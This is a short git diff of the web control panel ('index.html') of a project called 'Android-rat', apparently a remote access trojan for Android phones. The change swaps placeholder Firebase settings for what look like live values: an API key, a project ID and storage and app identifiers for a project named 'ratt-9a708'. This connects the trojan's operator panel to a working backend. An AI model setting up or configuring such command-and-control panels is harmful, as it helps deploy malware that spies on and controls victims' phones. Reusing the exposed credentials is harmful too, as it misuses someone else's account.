--- a/Android-rat/WEB PANEL/index.html
+++ b/Android-rat/WEB PANEL/index.html
@@ -12,14 +12,14 @@
 <script type="text/javascript">
 //EDIT UNDER THIS ONLY
 
-const  firebaseConfig = {
-apiKey: "API KEY",
-authDomain: "AUTH DOMAIN",
-databaseURL: "DATABSE URL",
-projectId: "PROJECT ID",
-storageBucket: "BUCKET URL",
-messagingSenderId: "SENDER ID",
-appId: "APP ID"
+const firebaseConfig = {
+  apiKey: "AIzaSyBbXZLSUBfMBp4-GA1bkqDavgCIGGeHCD0",
+  authDomain: "ratt-9a708.firebaseapp.com",
+  projectId: "ratt-9a708",
+  storageBucket: "ratt-9a708.firebasestorage.app",
+  messagingSenderId: "1058536397355",
+  appId: "1:1058536397355:web:5a66f5dc61c24ed3aea86e",
+  measurementId: "G-Q27B4LQGPL"
 };
  
 
